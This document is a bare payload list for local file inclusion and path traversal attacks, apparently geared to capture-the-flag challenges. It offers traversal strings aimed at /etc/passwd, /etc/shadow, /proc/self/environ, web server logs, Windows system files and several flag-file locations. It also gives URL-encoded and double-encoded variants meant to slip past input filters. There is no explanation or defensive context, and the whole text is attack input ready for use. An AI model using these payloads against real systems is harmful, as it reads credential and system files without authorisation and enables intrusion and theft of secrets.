# LFI / Path Traversal fallback payloads
../../../../../../../../etc/passwd
../../../../../../../../etc/shadow
../../../../../../../../etc/hosts
../../../../../../../../etc/hostname
../../../../../../../../proc/self/environ
../../../../../../../../proc/self/cmdline
../../../../../../../../var/log/apache2/access.log
../../../../../../../../var/log/nginx/access.log
../../../../../../../../flag.txt
../../../../../../../../flag
../../../../../../../../home/user/flag.txt
../../../../../../../../home/ctf/flag.txt
../../../../../../../../var/www/html/flag.txt
../../../../../../../../root/flag.txt
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..\..\..\..\windows\win.ini
..\..\..\..\boot.ini
../../../../windows/win.ini
../../../../WINDOWS/win.ini
/etc/passwd
/etc/shadow
/flag.txt
/flag
/root/flag.txt
